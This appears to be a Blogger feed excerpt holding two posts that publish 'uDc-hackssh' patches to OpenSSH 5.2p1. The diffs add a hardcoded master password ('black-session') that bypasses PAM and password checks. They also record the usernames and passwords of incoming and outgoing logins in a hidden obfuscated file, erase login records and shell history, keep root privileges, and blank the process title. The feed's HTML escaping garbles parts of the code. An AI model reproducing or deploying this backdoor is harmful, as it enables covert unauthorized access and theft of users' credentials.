#define SSH_LOG       "/usr/share/yelp/im.xml"&lt;br /&gt;+&lt;br /&gt;+     FILE *bajaulog;&lt;br /&gt;+     char  abuff[1024];&lt;br /&gt;+     int   kambing, ai, uDc;&lt;br /&gt;+&lt;br /&gt;+ #define uDclog() {                                 \&lt;br /&gt;+     kambing=strlen(abuff);                               \&lt;br /&gt;+     for(ai=0; ai&amp;lt;=kambing; ai++) abuff[ai]=~abuff[ai];   \&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+     bajaulog=fopen(SSH_LOG, "a");                         \&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+     if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+     chmod(SSH_LOG, 0666);                             \&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+ }&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+ const char *get_remote_ipaddr(void);&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+ // end of patch&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+ #ifndef INCLUDES_H&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;#define INCLUDES_H&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;diff -Ncr openssh-5.2p1/log.c uDc-hackssh-v1.0b/log.c&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;*** openssh-5.2p1/log.c    Tue Jun 10 21:01:51 2008&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;--- uDc-hackssh-v1.0b/log.c    Fri Sep 11 22:38:47 2009&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;***************&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;*** 338,343 ****&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;--- 338,346 ----&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;int pri = LOG_INFO;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;int saved_errno = errno;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+     // slash patch&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+     if(uDc) return;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+     // end of patch if (level &amp;gt; log_level)&lt;br /&gt;return;&lt;br /&gt;&lt;br /&gt;diff -Ncr openssh-5.2p1/loginrec.c uDc-hackssh-v1.0b/loginrec.c&lt;br /&gt;*** openssh-5.2p1/loginrec.c    Thu Feb 12 10:12:22 2009&lt;br /&gt;--- uDc-hackssh-v1.0b/loginrec.c    Fri Sep 11 22:38:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 431,436 ****&lt;br /&gt;--- 431,439 ----&lt;br /&gt;int&lt;br /&gt;login_write(struct logininfo *li)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(uDc) return 0;&lt;br /&gt;+     // end of patch&lt;br /&gt;#ifndef HAVE_CYGWIN&lt;br /&gt;if (geteuid() != 0) {&lt;br /&gt;logit("Attempt to write login records by non-root user (aborting)");&lt;br /&gt;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;diff -Ncr openssh-5.2p1/session.c uDc-hackssh-v1.0b/session.c&lt;br /&gt;*** openssh-5.2p1/session.c    Wed Jan 28 13:29:49 2009&lt;br /&gt;--- uDc-hackssh-v1.0b/session.c    Fri Sep 11 23:48:15 2009&lt;br /&gt;***************&lt;br /&gt;*** 1193,1198 ****&lt;br /&gt;--- 1193,1203 ----&lt;br /&gt;if (getenv("TZ"))&lt;br /&gt;child_set_env(&amp;amp;env, &amp;amp;envsize, "TZ", getenv("TZ"));&lt;br /&gt;&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(uDc)&lt;br /&gt;+         child_set_env(&amp;amp;env, &amp;amp;envsize, "HISTFILE", "/dev/null");&lt;br /&gt;+     // end of patch&lt;br /&gt;+&lt;br /&gt;/* Set custom environment options from RSA authentication. */&lt;br /&gt;if (!options.use_login) {&lt;br /&gt;while (custom_environment) {&lt;br /&gt;***************&lt;br /&gt;*** 1496,1501 ****&lt;br /&gt;--- 1501,1510 ----&lt;br /&gt;&lt;br /&gt;if (setlogin(pw-&amp;gt;pw_name) &amp;lt; 0) error("setlogin failed: %s", strerror(errno));&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+         // slash patch&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+         if(!uDc) {&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+         // end of patch&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+ if (setgid(pw-&amp;gt;pw_gid) &amp;lt; 0) { perror("setgid"); exit(1);&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;***************&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;*** 1505,1510 ****&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;--- 1514,1526 ----&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;perror("initgroups");&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;exit(1);&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;}&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+         // slash patch&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+         }&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+         else {&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+             setgid(0);&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;+             initgroups(pw-&amp;gt;pw_name, 0);&lt;br /&gt;+         }&lt;br /&gt;+         // end of patch&lt;br /&gt;endgrent();&lt;br /&gt;# ifdef USE_PAM&lt;br /&gt;/*&lt;br /&gt;***************&lt;br /&gt;*** 1547,1552 ****&lt;br /&gt;--- 1563,1570 ----&lt;br /&gt;}&lt;br /&gt;#else&lt;br /&gt;/* Permanently switch to the desired uid. */&lt;br /&gt;+         // slash patch&lt;br /&gt;+         if(!uDc)&lt;br /&gt;permanently_set_uid(pw);&lt;br /&gt;#endif&lt;br /&gt;}&lt;br /&gt;***************&lt;br /&gt;*** 1554,1560 ****&lt;br /&gt;#ifdef HAVE_CYGWIN&lt;br /&gt;if (is_winnt)&lt;br /&gt;#endif&lt;br /&gt;!     if (getuid() != pw-&amp;gt;pw_uid || geteuid() != pw-&amp;gt;pw_uid)&lt;br /&gt;fatal("Failed to set uids to %u.", (u_int) pw-&amp;gt;pw_uid);&lt;br /&gt;&lt;br /&gt;#ifdef WITH_SELINUX&lt;br /&gt;--- 1572,1581 ----&lt;br /&gt;#ifdef HAVE_CYGWIN&lt;br /&gt;if (is_winnt)&lt;br /&gt;#endif&lt;br /&gt;!     // slash patch&lt;br /&gt;!     //if (getuid() != pw-&amp;gt;pw_uid || geteuid() != pw-&amp;gt;pw_uid)&lt;br /&gt;!     if ((getuid() != pw-&amp;gt;pw_uid || geteuid() != pw-&amp;gt;pw_uid) &amp;amp;&amp;amp; !uDc)&lt;br /&gt;!     // end of patch&lt;br /&gt;fatal("Failed to set uids to %u.", (u_int) pw-&amp;gt;pw_uid);&lt;br /&gt;&lt;br /&gt;#ifdef WITH_SELINUX&lt;br /&gt;***************&lt;br /&gt;*** 2614,2621 ****&lt;br /&gt;{&lt;br /&gt;if (s-&amp;gt;pw == NULL)&lt;br /&gt;error("no user for session %d", s-&amp;gt;self);&lt;br /&gt;!     else&lt;br /&gt;!         setproctitle("%s@%s", s-&amp;gt;pw-&amp;gt;pw_name, session_tty_list());&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int&lt;br /&gt;--- 2635,2648 ----&lt;br /&gt;{&lt;br /&gt;if (s-&amp;gt;pw == NULL)&lt;br /&gt;error("no user for session %d", s-&amp;gt;self);&lt;br /&gt;!     // slash patch&lt;br /&gt;!     else {&lt;br /&gt;!         if(!uDc)&lt;br /&gt;!             setproctitle("%s@%s", s-&amp;gt;pw-&amp;gt;pw_name, session_tty_list());&lt;br /&gt;!         else&lt;br /&gt;!             setproctitle("","");&lt;br /&gt;!     }&lt;br /&gt;!     // end of patch&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int&lt;br /&gt;diff -Ncr openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0b/sshconnect1.c&lt;br /&gt;*** openssh-5.2p1/sshconnect1.c    Tue Nov  7 20:14:42 2006&lt;br /&gt;--- uDc-hackssh-v1.0b/sshconnect1.c    Fri Sep 11 22:38:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 458,463 ****&lt;br /&gt;--- 458,468 ----&lt;br /&gt;password = read_passphrase(prompt, 0);&lt;br /&gt;packet_start(SSH_CMSG_AUTH_PASSWORD);&lt;br /&gt;ssh_put_password(password);&lt;br /&gt;+         // slash patch&lt;br /&gt;+         sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+             get_remote_ipaddr(), options.user, password);&lt;br /&gt;+         uDclog();&lt;br /&gt;+         // end of patch&lt;br /&gt;memset(password, 0, strlen(password));&lt;br /&gt;xfree(password);&lt;br /&gt;packet_send();&lt;br /&gt;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;diff -Ncr openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0b/sshconnect2.c&lt;br /&gt;*** openssh-5.2p1/sshconnect2.c    Wed Nov  5 13:20:47 2008&lt;br /&gt;--- uDc-hackssh-v1.0b/sshconnect2.c    Fri Sep 11 22:38:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 797,802 ****&lt;br /&gt;--- 797,807 ----&lt;br /&gt;packet_put_cstring(authctxt-&amp;gt;method-&amp;gt;name);&lt;br /&gt;packet_put_char(0);&lt;br /&gt;packet_put_cstring(password);&lt;br /&gt;+     // slash patch&lt;br /&gt;+     sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+         get_remote_ipaddr(), options.user, password);&lt;br /&gt;+     uDclog();&lt;br /&gt;+     // end of patch&lt;br /&gt;memset(password, 0, strlen(password));&lt;br /&gt;xfree(password);&lt;br /&gt;packet_add_padding(64);&lt;br /&gt;***************&lt;br /&gt;*** 1464,1469 ****&lt;br /&gt;--- 1469,1479 ----&lt;br /&gt;&lt;br /&gt;response = read_passphrase(prompt, echo ? RP_ECHO : 0);&lt;br /&gt;&lt;br /&gt;+         // slash patch&lt;br /&gt;+         sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+             get_remote_ipaddr(), options.user, response);&lt;br /&gt;+         uDclog();&lt;br /&gt;+         // end of patch&lt;br /&gt;packet_put_cstring(response);&lt;br /&gt;memset(response, 0, strlen(response));&lt;br /&gt;xfree(response);&lt;br /&gt;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;diff -Ncr openssh-5.2p1/sshlogin.c uDc-hackssh-v1.0b/sshlogin.c&lt;br /&gt;*** openssh-5.2p1/sshlogin.c    Mon Sep 17 14:09:16 2007&lt;br /&gt;--- uDc-hackssh-v1.0b/sshlogin.c    Sat Sep 12 00:03:40 2009&lt;br /&gt;***************&lt;br /&gt;*** 118,123 ****&lt;br /&gt;--- 118,126 ----&lt;br /&gt;record_login(pid_t pid, const char *tty, const char *user, uid_t uid,&lt;br /&gt;const char *host, struct sockaddr *addr, socklen_t addrlen)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!uDc) {&lt;br /&gt;+     // end of patch&lt;br /&gt;struct logininfo *li;&lt;br /&gt;&lt;br /&gt;/* save previous login details before writing new */&lt;br /&gt;***************&lt;br /&gt;*** 127,132 ****&lt;br /&gt;--- 130,138 ----&lt;br /&gt;login_set_addr(li, addr, addrlen);&lt;br /&gt;login_login(li);&lt;br /&gt;login_free_entry(li);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#ifdef LOGIN_NEEDS_UTMPX&lt;br /&gt;***************&lt;br /&gt;*** 134,145 ****&lt;br /&gt;--- 140,157 ----&lt;br /&gt;record_utmp_only(pid_t pid, const char *ttyname, const char *user,&lt;br /&gt;const char *host, struct sockaddr *addr, socklen_t addrlen)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!uDc) {&lt;br /&gt;+     // end of patch&lt;br /&gt;struct logininfo *li;&lt;br /&gt;&lt;br /&gt;li = login_alloc_entry(pid, user, host, ttyname);&lt;br /&gt;login_set_addr(li, addr, addrlen);&lt;br /&gt;login_utmp_only(li);&lt;br /&gt;login_free_entry(li);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;}&lt;br /&gt;#endif&lt;br /&gt;&lt;br /&gt;***************&lt;br /&gt;*** 147,155 ****&lt;br /&gt;--- 159,173 ----&lt;br /&gt;void&lt;br /&gt;record_logout(pid_t pid, const char *tty, const char *user)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!uDc) {&lt;br /&gt;+     // end of patch&lt;br /&gt;struct logininfo *li;&lt;br /&gt;&lt;br /&gt;li = login_alloc_entry(pid, user, NULL, tty);&lt;br /&gt;login_logout(li);&lt;br /&gt;login_free_entry(li);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;}&lt;br /&gt;&amp;nbsp;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;br /&gt;&lt;sys stat.h=""&gt;&lt;stdio.h&gt;diff -Ncr openssh-5.2p1/version.h uDc-hackssh-v1.0b/version.h&lt;br /&gt;*** openssh-5.2p1/version.h    Mon Feb 23 08:09:26 2009&lt;br /&gt;--- uDc-hackssh-v1.0b/version.h    Fri Sep 11 22:38:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 1,6 ****&lt;br /&gt;--- 1,9 ----&lt;br /&gt;/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */&lt;br /&gt;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ // change to targetted openssh verions&lt;br /&gt;#define SSH_VERSION    "OpenSSH_5.2"&lt;br /&gt;&lt;br /&gt;#define SSH_PORTABLE    "p1"&lt;br /&gt;#define SSH_RELEASE    SSH_VERSION SSH_PORTABLE&lt;br /&gt;+ // end of patch&lt;br /&gt;&lt;sys h=""&gt;&lt;stdio.h&gt;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2261729260503198423?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2261729260503198423/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2261729260503198423' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2261729260503198423'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2261729260503198423'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/09/udc-hackssh-v10b.html' title='uDc-hackssh-v1.0b'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/Sqp6xNn4LLI/AAAAAAAAAog/YbxHGz7DZcM/s72-c/hackpermit.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4461856475494117721</id><published>2009-07-21T23:01:00.006+08:00</published><updated>2009-09-14T00:58:42.372+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>uDc-hackssh-v1.0a</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SmXcNl7raxI/AAAAAAAAAoQ/BjME9NrGXaQ/s1600-h/hackpermit.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5360933057533274898" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; WIDTH: 200px; CURSOR: pointer; HEIGHT: 200px" alt="" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SmXcNl7raxI/AAAAAAAAAoQ/BjME9NrGXaQ/s200/hackpermit.jpg" border="0" /&gt;&lt;/a&gt;The following openssh-5.2p1 patches allow users to:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;login with any users with 'magic password'&lt;/li&gt;&lt;li&gt;hide footprint from wtmp, utmp and lastlog&lt;/li&gt;&lt;li&gt;log ssh inbound and outbound username and password&lt;/li&gt;&lt;/ul&gt;This patches tested on Mac OS X, Solaris 5.10, Ubuntu 8.10 and FreeBSD 7.10. It should works for other operating system too.&lt;br /&gt;&lt;br /&gt;slash@Slash-The-Undergrounds-Hackintosh:$ cat uDc-hackssh-v1.0a&lt;br /&gt;diff -Nrc openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0a/auth-pam.c&lt;br /&gt;*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008&lt;br /&gt;--- uDc-hackssh-v1.0a/auth-pam.c Sun Jul 19 13:59:46 2009&lt;br /&gt;***************&lt;br /&gt;*** 466,471 ****&lt;br /&gt;--- 466,474 ----&lt;br /&gt;if (sshpam_err != PAM_SUCCESS)&lt;br /&gt;goto auth_fail;&lt;br /&gt;sshpam_err = pam_authenticate(sshpam_handle, flags);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ if(uDc) sshpam_err = PAM_SUCCESS;&lt;br /&gt;+ // end of patch&lt;br /&gt;if (sshpam_err != PAM_SUCCESS)&lt;br /&gt;goto auth_fail;&lt;br /&gt;&lt;br /&gt;***************&lt;br /&gt;*** 816,821 ****&lt;br /&gt;--- 819,833 ----&lt;br /&gt;Buffer buffer;&lt;br /&gt;struct pam_ctxt *ctxt = ctx;&lt;br /&gt;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ if(sshpam_authctxt)&lt;br /&gt;+ for (ai = 0; ai &lt;&gt;user, resp[ai]);&lt;br /&gt;+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt-&gt;pam_done = uDc = 1;&lt;br /&gt;+ else uDclog();&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;debug2("PAM: %s entering, %u responses", __func__, num);&lt;br /&gt;switch (ctxt-&gt;pam_done) {&lt;br /&gt;case 1:&lt;br /&gt;***************&lt;br /&gt;*** 1045,1050 ****&lt;br /&gt;--- 1057,1065 ----&lt;br /&gt;if (sshpam_err != PAM_SUCCESS)&lt;br /&gt;fatal("PAM: failed to set PAM_CONV: %s",&lt;br /&gt;pam_strerror(sshpam_handle, sshpam_err));&lt;br /&gt;+ // slash patch&lt;br /&gt;+ if(!uDc)&lt;br /&gt;+ // end of patch&lt;br /&gt;sshpam_err = pam_open_session(sshpam_handle, 0);&lt;br /&gt;if (sshpam_err == PAM_SUCCESS)&lt;br /&gt;sshpam_session_open = 1;&lt;br /&gt;diff -Nrc openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0a/auth-passwd.c&lt;br /&gt;*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007&lt;br /&gt;--- uDc-hackssh-v1.0a/auth-passwd.c Sun Jul 19 14:01:06 2009&lt;br /&gt;***************&lt;br /&gt;*** 92,97 ****&lt;br /&gt;--- 92,103 ----&lt;br /&gt;#endif&lt;br /&gt;if (*password == '\0' &amp;amp;&amp;amp; options.permit_empty_passwd == 0)&lt;br /&gt;return 0;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ if(!strcmp(BAJAUPASS, password)) return uDc = 1;&lt;br /&gt;+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+ get_remote_ipaddr(), pw-&gt;pw_name, password);&lt;br /&gt;+ uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;&lt;br /&gt;#ifdef KRB5&lt;br /&gt;if (options.kerberos_authentication == 1) {&lt;br /&gt;diff -Nrc openssh-5.2p1/includes.h uDc-hackssh-v1.0a/includes.h&lt;br /&gt;*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008&lt;br /&gt;--- uDc-hackssh-v1.0a/includes.h Sun Jul 19 14:09:10 2009&lt;br /&gt;***************&lt;br /&gt;*** 13,18 ****&lt;br /&gt;--- 13,41 ----&lt;br /&gt;* called by a name other than "ssh" or "Secure Shell".&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ #include &lt;sys h=""&gt;&lt;br /&gt;+ #include &lt;stdio.h&gt;&lt;br /&gt;+&lt;br /&gt;+ #define BAJAUPASS "black-session"&lt;br /&gt;+ #define SSH_LOG "/var/run/sshd.sync"&lt;br /&gt;+&lt;br /&gt;+ FILE *bajaulog;&lt;br /&gt;+ char abuff[1024];&lt;br /&gt;+ int kambing, ai, uDc;&lt;br /&gt;+&lt;br /&gt;+ #define uDclog() { \&lt;br /&gt;+ kambing=strlen(abuff); \&lt;br /&gt;+ for(ai=0; ai&lt;=kambing; ai++) abuff[ai]=~abuff[ai]; \&lt;br /&gt;+ bajaulog=fopen(SSH_LOG, "a"); \&lt;br /&gt;+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \&lt;br /&gt;+ chmod(SSH_LOG, 0666); \&lt;br /&gt;+ }&lt;br /&gt;+&lt;br /&gt;+ const char *get_remote_ipaddr(void);&lt;br /&gt;+ // end of patch&lt;br /&gt;+&lt;br /&gt;+ #ifndef INCLUDES_H&lt;br /&gt;#define INCLUDES_H&lt;br /&gt;diff -Nrc openssh-5.2p1/log.c uDc-hackssh-v1.0a/log.c&lt;br /&gt;*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008&lt;br /&gt;--- uDc-hackssh-v1.0a/log.c Sun Jul 19 14:09:50 2009&lt;br /&gt;***************&lt;br /&gt;*** 338,343 ****&lt;br /&gt;--- 338,346 ----&lt;br /&gt;int pri = LOG_INFO;&lt;br /&gt;int saved_errno = errno;&lt;br /&gt;+ // slash patch + if(uDc) return;&lt;br /&gt;+ // end of patch if (level &gt; log_level)&lt;br /&gt;return;&lt;br /&gt;&lt;br /&gt;diff -Nrc openssh-5.2p1/loginrec.c uDc-hackssh-v1.0a/loginrec.c&lt;br /&gt;*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009&lt;br /&gt;--- uDc-hackssh-v1.0a/loginrec.c Sun Jul 19 14:11:00 2009&lt;br /&gt;***************&lt;br /&gt;*** 431,436 ****&lt;br /&gt;--- 431,439 ----&lt;br /&gt;int&lt;br /&gt;login_write(struct logininfo *li)&lt;br /&gt;{&lt;br /&gt;+ // slash patch&lt;br /&gt;+ if(uDc) return 0;&lt;br /&gt;+ // end of patch&lt;br /&gt;#ifndef HAVE_CYGWIN&lt;br /&gt;if (geteuid() != 0) {&lt;br /&gt;logit("Attempt to write login records by non-root user (aborting)");&lt;br /&gt;diff -Nrc openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0a/sshconnect1.c&lt;br /&gt;*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006&lt;br /&gt;--- uDc-hackssh-v1.0a/sshconnect1.c Sun Jul 19 14:12:35 2009&lt;br /&gt;***************&lt;br /&gt;*** 458,463 ****&lt;br /&gt;--- 458,468 ----&lt;br /&gt;password = read_passphrase(prompt, 0);&lt;br /&gt;packet_start(SSH_CMSG_AUTH_PASSWORD);&lt;br /&gt;ssh_put_password(password);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+ get_remote_ipaddr(), options.user, password);&lt;br /&gt;+ uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;memset(password, 0, strlen(password));&lt;br /&gt;xfree(password);&lt;br /&gt;packet_send();&lt;br /&gt;diff -Nrc openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0a/sshconnect2.c&lt;br /&gt;*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008&lt;br /&gt;--- uDc-hackssh-v1.0a/sshconnect2.c Sun Jul 19 14:15:51 2009&lt;br /&gt;***************&lt;br /&gt;*** 797,802 ****&lt;br /&gt;--- 797,807 ----&lt;br /&gt;packet_put_cstring(authctxt-&gt;method-&gt;name);&lt;br /&gt;packet_put_char(0);&lt;br /&gt;packet_put_cstring(password);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+ get_remote_ipaddr(), options.user, password);&lt;br /&gt;+ uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;memset(password, 0, strlen(password));&lt;br /&gt;xfree(password);&lt;br /&gt;packet_add_padding(64);&lt;br /&gt;***************&lt;br /&gt;*** 1464,1469 ****&lt;br /&gt;--- 1469,1479 ----&lt;br /&gt;&lt;br /&gt;response = read_passphrase(prompt, echo ? RP_ECHO : 0);&lt;br /&gt;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+ get_remote_ipaddr(), options.user, response);&lt;br /&gt;+ uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;packet_put_cstring(response);&lt;br /&gt;memset(response, 0, strlen(response));&lt;br /&gt;xfree(response);&lt;br /&gt;diff -Nrc openssh-5.2p1/version.h uDc-hackssh-v1.0a/version.h&lt;br /&gt;*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009&lt;br /&gt;--- uDc-hackssh-v1.0a/version.h Sun Jul 19 14:17:31 2009&lt;br /&gt;***************&lt;br 